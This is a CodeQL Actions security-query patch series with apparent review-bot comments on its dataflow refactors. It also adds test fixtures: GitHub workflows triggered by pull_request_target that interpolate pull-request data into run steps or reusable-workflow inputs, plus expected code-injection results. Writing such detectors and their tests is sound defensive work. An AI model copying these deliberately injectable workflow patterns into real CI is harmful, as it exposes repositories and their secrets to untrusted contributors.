--- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.40 +version: 0.1.41 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 64d40f754805..5b81393abdb4 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml 
@@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.40 +version: 0.1.41 groups: [actions, queries] suites: codeql-suites extractor: javascript From 42b487b348329db069d1fc0b4f1bc542fe5b17ae Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 10 Sep 2024 09:49:43 +0200 Subject: [PATCH 496/707] Match callers and callees when root is not the repo root When running codeql test run, the root of the database is not the root of the original repo (the directory containing .github and .git) therefore calls to reusable workflows are not correctly matched. --- .../dataflow/internal/DataFlowPrivate.qll | 18 ++++++++++++++---- 1 file changed, 14 insertions(+), 4 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 47cd38d47fab..2d3918414106 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -86,7 +86,7 @@ class DataFlowCall instanceof Cfg::Node { int totalorder() { none() } /** Gets the location of this call. */ - Location getLocation() { result = this.getLocation() } + Location getLocation() { result = this.(Cfg::Node).getLocation() } } /** @@ -97,7 +97,17 @@ class DataFlowCallable instanceof Cfg::CfgScope { string getName() { if this instanceof ReusableWorkflow - then result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath() + then + result = + this.(ReusableWorkflow) + .getLocation() + .getFile() + .getRelativePath() + .suffix(this.(ReusableWorkflow) + .getLocation() + .getFile() + .getRelativePath() + .indexOf("/.github/workflows") + 1) else if this instanceof CompositeAction then 
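Review bot: `getName()` for a `ReusableWorkflow` now has no value whenever the relative path does not contain `"/.github/workflows"`: `indexOf` yields nothing, so `suffix` yields nothing, and that is presumably the layout of an ordinary database whose root is the repository root, where the path starts with `.github/workflows/` and has no leading slash; a path containing the substring twice conversely yields two names. One regex handles both: `result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath().regexpReplaceAll("^(.*/)?(?=\\.github/workflows/)", "")`, which strips any prefix before the last `.github/workflows/` and leaves a root-level path untouched. The `getLocation` change earlier in this file, `this.(Cfg::Node).getLocation()`, replaces a self-recursive definition and looks right. `getName()` continues past the hunk.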
@@ -118,7 +128,7 @@ class DataFlowCallable instanceof Cfg::CfgScope { int totalorder() { none() } /** Gets the location of this callable. */ - Location getLocation() { result = this.getLocation() } + Location getLocation() { result = this.(Cfg::CfgScope).getLocation() } } newtype TReturnKind = TNormalReturn() @@ -380,8 +390,8 @@ predicate storeStep(Node node1, ContentSet c, Node node2) { fieldStoreStep(node1, node2, c) or madStoreStep(node1, node2, c) or envToOutputStoreStep(node1, node2, c) or - artifactToOutputStoreStep(node1, node2, c) or envToEnvStoreStep(node1, node2, c) or + artifactToOutputStoreStep(node1, node2, c) or artifactToEnvStoreStep(node1, node2, c) } From bd0c762781df6f3c1d69ad2d114600d18904b55c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 10 Sep 2024 09:51:32 +0200 Subject: [PATCH 497/707] Refactor: Do not use PRHeadCheckoutStep on any dependency of TaintTracking Problem is that there are StoreSteps that depend on PRHeadCheckout so there is a non-monotic recursion error since PRHeadCheckout depends on TaintTracking module, but this module depends on PRHeadCheckout --- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 35 ++++++++++--------- .../security/OutputClobberingQuery.qll | 11 +++++- 2 files changed, 29 insertions(+), 17 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index aa31954ad3c5..9ca17eb4dab2 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll 
@@ -155,6 +155,20 @@ predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow:: ) } +predicate controlledCWD(Step artifact) { + artifact instanceof UntrustedArtifactDownloadStep or + // This shoould be: + // artifact instanceof PRHeadCheckoutStep + // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error + // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround + // instead of using ActionsMutableRefCheckout and ActionsSHACheckout + artifact.(Uses).getCallee() = "actions/checkout" or + artifact instanceof GitMutableRefCheckout or + artifact instanceof GitSHACheckout or + artifact instanceof GhMutableRefCheckout or + artifact instanceof GhSHACheckout +} + /** * A downloaded artifact that gets assigned to a Run step output. * - uses: actions/download-artifact@v2 @@ -165,10 +179,7 @@ predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow:: */ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(Run run, Step artifact, string content, string key, string value | - ( - artifact instanceof UntrustedArtifactDownloadStep or - artifact instanceof PRHeadCheckoutStep - ) and + controlledCWD(artifact) and ( // A file is read and its content is assigned to an env var // - run: | @@ -207,10 +218,7 @@ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Da */ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(Run run, string content, string key, string value, Step artifact | - ( - artifact instanceof UntrustedArtifactDownloadStep or - artifact instanceof PRHeadCheckoutStep - ) and + controlledCWD(artifact) and ( // A file is read and its content is assigned to an env var // - run: | 
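Review bot: `controlledCWD` treats every `actions/checkout` step as an attacker-controlled working directory (`artifact.(Uses).getCallee() = "actions/checkout"`), which is strictly broader than the `PRHeadCheckoutStep` it stands in for: a plain base-branch checkout in a `pull_request_target` workflow now also enables the artifact-to-output and artifact-to-env store steps, so expect additional findings a reviewer has to dismiss. If the recursion cannot be broken another way, consider limiting the workaround to checkouts that pass a `ref` (`exists(artifact.(Uses).getArgument("ref"))`), which is the argument the visible mutable-ref/SHA checkout classes key on, and give the predicate a QLDoc header that states the over-approximation, e.g. `/** Holds if the working directory after step artifact may contain attacker-controlled files: an untrusted artifact download or a checkout. Over-approximates PRHeadCheckoutStep to avoid non-monotonic recursion through TaintTracking. */`. The inline comment also has typos (`shoould`, `anc`, `non-Monolitic`, which should read non-monotonic).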
@@ -246,25 +254,20 @@ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataF */ predicate artifactDownloadToRunStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Step artifact, Run run | - ( - artifact instanceof UntrustedArtifactDownloadStep or - artifact instanceof PRHeadCheckoutStep - ) and + controlledCWD(artifact) and pred.asExpr() = artifact and succ.asExpr() = run.getScriptScalar() and artifact.getAFollowingStep() = run ) } +// /** * A download artifact step followed by a envvar-injection uses step . */ predicate artifactDownloadToUsesStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Step artifact, Uses uses | - ( - artifact instanceof UntrustedArtifactDownloadStep or - artifact instanceof PRHeadCheckoutStep - ) and + controlledCWD(artifact) and madSink(succ, "envvar-injection") and pred.asExpr() = artifact and succ.asExpr() = uses and diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index 5a85c22bb8fa..38a8d2b9d0b9 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll 
@@ -22,7 +22,16 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { exists(Run run, Step step | ( step instanceof UntrustedArtifactDownloadStep or - step instanceof PRHeadCheckoutStep + // This shoould be: + // artifact instanceof PRHeadCheckoutStep + // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error + // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround + // instead of using ActionsMutableRefCheckout and ActionsSHACheckout + step.(Uses).getCallee() = "actions/checkout" or + step instanceof GitMutableRefCheckout or + step instanceof GitSHACheckout or + step instanceof GhMutableRefCheckout or + step instanceof GhSHACheckout ) and this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and From 147da50cb993e35cc7831cd5ccf1efd573895255 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 10 Sep 2024 09:52:09 +0200 Subject: [PATCH 498/707] Use Taint Tracking to track PR refs to checkout's ref argument --- .../security/UntrustedCheckoutQuery.qll | 150 +++++++++++------- 1 file changed, 95 insertions(+), 55 deletions(-) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 7cfda4da49cb..df3e1e4d8a2e 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll 
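Review bot: This disjunction is a verbatim copy of the `controlledCWD` predicate the same commit adds to FlowSteps.qll, comment and typos included, so there are now two workaround lists to remember when `PRHeadCheckoutStep` can be used again. If `codeql.actions.dataflow.FlowSteps` is in scope here (the imports are outside the hunk), replace the nine added lines with `controlledCWD(step)` and keep the explanation in one place, on the predicate. The characteristic predicate of `OutputClobberingFromFileReadSink` continues past the hunk.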
@@ -1,12 +1,90 @@ import actions -import codeql.actions.DataFlow +private import codeql.actions.DataFlow +private import codeql.actions.TaintTracking -string getStepCWD() { - // TODO: This should be the path of the git command. - // Read if from the step's CWD, workspace or look for a cd command. - result = "?" +/** + * A taint-tracking configuration for PR HEAD references flowing + * into actions/checkout's ref argument. + */ +private module ActionsMutableRefCheckoutConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + // `ref` argument contains the PR id/number or head ref + exists(Expression e | + source.asExpr() = e and + ( + containsHeadRef(e.getExpression()) or + containsPullRequestNumber(e.getExpression()) + ) + ) + or + // 3rd party actions returning the PR head ref + exists(StepsExpression e, UsesStep step | + source.asExpr() = e and + e.getStepId() = step.getId() and + ( + step.getCallee() = "eficode/resolve-pr-refs" and e.getFieldName() = "head_ref" + or + step.getCallee() = "xt0rted/pull-request-comment-branch" and e.getFieldName() = "head_ref" + or + step.getCallee() = "alessbell/pull-request-comment-branch" and e.getFieldName() = "head_ref" + or + step.getCallee() = "gotson/pull-request-comment-branch" and e.getFieldName() = "head_ref" + or + step.getCallee() = "potiuk/get-workflow-origin" and + e.getFieldName() = ["sourceHeadBranch", "pullRequestNumber"] + or + step.getCallee() = "github/branch-deploy" and e.getFieldName() = ["ref", "fork_ref"] + ) + ) + } + + predicate isSink(DataFlow::Node sink) { + exists(Uses uses | + uses.getCallee() = "actions/checkout" and + uses.getArgumentExpr("ref") = sink.asExpr() + ) + } +} + +module ActionsMutableRefCheckoutFlow = TaintTracking::Global; + +private module ActionsSHACheckoutConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + // `ref` argument contains the PR head/merge commit sha + exists(Expression e | + source.asExpr() = e and + 
containsHeadSHA(e.getExpression()) + ) + or + // 3rd party actions returning the PR head sha + exists(StepsExpression e, UsesStep step | + source.asExpr() = e and + e.getStepId() = step.getId() and + ( + step.getCallee() = "eficode/resolve-pr-refs" and e.getFieldName() = "head_sha" + or + step.getCallee() = "xt0rted/pull-request-comment-branch" and e.getFieldName() = "head_sha" + or + step.getCallee() = "alessbell/pull-request-comment-branch" and e.getFieldName() = "head_sha" + or + step.getCallee() = "gotson/pull-request-comment-branch" and e.getFieldName() = "head_sha" + or + step.getCallee() = "potiuk/get-workflow-origin" and + e.getFieldName() = ["sourceHeadSha", "mergeCommitSha"] + ) + ) + } + + predicate isSink(DataFlow::Node sink) { + exists(Uses uses | + uses.getCallee() = "actions/checkout" and + uses.getArgumentExpr("ref") = sink.asExpr() + ) + } } +module ActionsSHACheckoutFlow = TaintTracking::Global; + bindingset[s] predicate containsPullRequestNumber(string s) { exists( @@ -73,6 +151,12 @@ predicate containsHeadRef(string s) { ) } +private string getStepCWD() { + // TODO: This should be the path of the git command. + // Read if from the step's CWD, workspace or look for a cd command. + result = "?" +} + /** Checkout of a Pull Request HEAD */ abstract class PRHeadCheckoutStep extends Step { abstract string getPath(); 
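Review bot: The two configurations repeat each other: `isSink` is identical in both (the `ref` argument of `actions/checkout`), and the third-party callee/field table is written out twice with only the field names differing. A shared `private predicate checkoutRefSink(DataFlow::Node sink)` and one table such as `private predicate prHeadOutput(string callee, string field, boolean isSha)` would let the mutable-ref and SHA sources differ by a single column instead of a duplicated block. As rendered here, `module ActionsMutableRefCheckoutFlow = TaintTracking::Global;` and its SHA twin carry no module argument; presumably the file reads `TaintTracking::Global<ActionsMutableRefCheckoutConfig>` and the angle brackets were lost in rendering, but it is worth confirming that it is the page and not the file.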
@@ -89,35 +173,9 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt
 ActionsMutableRefCheckout() {
 this.getCallee() = "actions/checkout" and
 (
- // ref argument contains the PR id/number or head ref/sha
- exists(Expression e |
- (
- containsHeadRef(e.getExpression()) or
- containsPullRequestNumber(e.getExpression())
- ) and
- DataFlow::hasLocalFlowExpr(e, this.getArgumentExpr("ref"))
- )
- or
- // 3rd party actions returning the PR head sha/ref
- exists(UsesStep step |
- (
- step.getCallee() =
- [
- "eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch",
- "alessbell/pull-request-comment-branch", "gotson/pull-request-comment-branch"
- ] and
- // TODO: This should be read step of the head_sha or head_ref output vars
- this.getArgument("ref").regexpMatch(".*(head_ref).*")
- or
- step.getCallee() = "potiuk/get-workflow-origin" and
- // TODO: This should be read step of the ref output var
- this.getArgument("ref").matches("%." + ["sourceHeadBranch", "pullRequestNumber"])
- or
- step.getCallee() = "github/branch-deploy" and
- // TODO: This should be read step of the ref output var
- this.getArgument("ref").matches("%.ref%")
- ) and
- DataFlow::hasLocalFlowExpr(step, this.getArgumentExpr("ref"))
+ exists(ActionsMutableRefCheckoutFlow::PathNode sink |
+ ActionsMutableRefCheckoutFlow::flowPath(_, sink) and
+ sink.getNode().asExpr() = this.getArgumentExpr("ref")
 )
 or
 // heuristic base on the step id and field name
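Review bot: `ActionsMutableRefCheckoutFlow::flowPath(_, sink)` over a `PathNode` is the path-problem API; here the result is only a yes/no test on the sink expression, so the plain `flow` predicate gives the same answer without materialising path graphs: `exists(DataFlow::Node sink | ActionsMutableRefCheckoutFlow::flow(_, sink) and sink.asExpr() = this.getArgumentExpr("ref"))`. The characteristic predicate, including the `// heuristic` branch that follows, continues past the hunk.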
@@ -159,27 +217,9 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep {
 ActionsSHACheckout() {
 this.getCallee() = "actions/checkout" and
 (
- // ref argument contains the PR id/number or head ref/sha
- exists(Expression e |
- containsHeadSHA(e.getExpression()) and
- DataFlow::hasLocalFlowExpr(e, this.getArgumentExpr("ref"))
- )
- or
- // 3rd party actions returning the PR head sha/ref
- exists(UsesStep step |
- (
- step.getCallee() =
- [
- "eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch",
- "alessbell/pull-request-comment-branch", "gotson/pull-request-comment-branch"
- ] and
- this.getArgument("ref").regexpMatch(".*(head_sha).*")
- or
- step.getCallee() = "potiuk/get-workflow-origin" and
- // TODO: This should be read step of the ref output var
- this.getArgument("ref").matches("%." + ["sourceHeadSha", "mergeCommitSha"])
- ) and
- DataFlow::hasLocalFlowExpr(step, this.getArgumentExpr("ref"))
+ exists(ActionsSHACheckoutFlow::PathNode sink |
+ ActionsSHACheckoutFlow::flowPath(_, sink) and
+ sink.getNode().asExpr() = this.getArgumentExpr("ref")
 )
 or
 // heuristic base on the step id and field name
From a9a297ab78571f563890eb588136a1275d5b4c06 Mon Sep 17 00:00:00 2001
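Review bot: `ActionsSHACheckoutFlow::flowPath(_, sink)` on a `PathNode` builds path-graph edges that nothing here consumes; the membership test is `exists(DataFlow::Node sink | ActionsSHACheckoutFlow::flow(_, sink) and sink.asExpr() = this.getArgumentExpr("ref"))`. With this change the `ActionsSHACheckout` and `ActionsMutableRefCheckout` constructors differ only in the flow module, so a small shared helper taking the sink expression would keep the two from drifting apart. The characteristic predicate continues past the hunk.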
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 10 Sep 2024 09:52:21 +0200 Subject: [PATCH 499/707] Update tests --- .../Security/CWE-094/.github/workflows/or.yml | 14 + .../CWE-094/CodeInjectionCritical.expected | 12 + .../CWE-094/CodeInjectionMedium.expected | 10 + .../.github/workflows/pr-workflow-fork.yaml | 27 + .../CWE-829/.github/workflows/pr-workflow.yml | 463 ++++++++++++++++++ .../CWE-829/UnpinnedActionsTag.expected | 10 + .../UntrustedCheckoutCritical.expected | 37 ++ 7 files changed, 573 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/or.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow-fork.yaml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/or.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/or.yml new file mode 100644 index 000000000000..bb873ca4eac8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/or.yml @@ -0,0 +1,14 @@ +name: CI + +on: + pull_request_target: + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: | + echo ${{ inputs.github_event_pull_request_head_sha || github.sha }} + + + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 69085548f69d..2097a589b5a3 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
@@ -64,8 +64,12 @@ edges | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | provenance | | | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | provenance | | | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | provenance | | +| .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | provenance | | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | provenance | | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | provenance | | 
@@ -270,10 +274,16 @@ nodes | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | +| .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | 
@@ -434,7 +444,9 @@ subpaths | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | +| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 360c33720fb0..ce4d74467f95 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -64,8 +64,12 @@ edges | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | provenance | | | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | provenance | | | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | provenance | | +| .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | provenance | | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | provenance | | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | provenance | | 
@@ -270,10 +274,16 @@ nodes | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | +| .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | 
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow-fork.yaml b/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow-fork.yaml
new file mode 100644
index 000000000000..98c25f832316
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow-fork.yaml
@@ -0,0 +1,27 @@
+name: "pr-workflow-fork"
+concurrency:
+ group: ${{ github.workflow }}-pr-workflow-fork-${{ github.event.pull_request.number || github.ref }}
+ cancel-in-progress: true
+
+on:
+ pull_request_target:
+
+jobs:
+ pr-workflow-fork:
+ uses: ./.github/workflows/pr-workflow.yml
+ with:
+ github_event_name: ${{ github.event_name }}
+ github_event_pull_request_head_repo_id : ${{ github.event.pull_request.head.repo.id }}
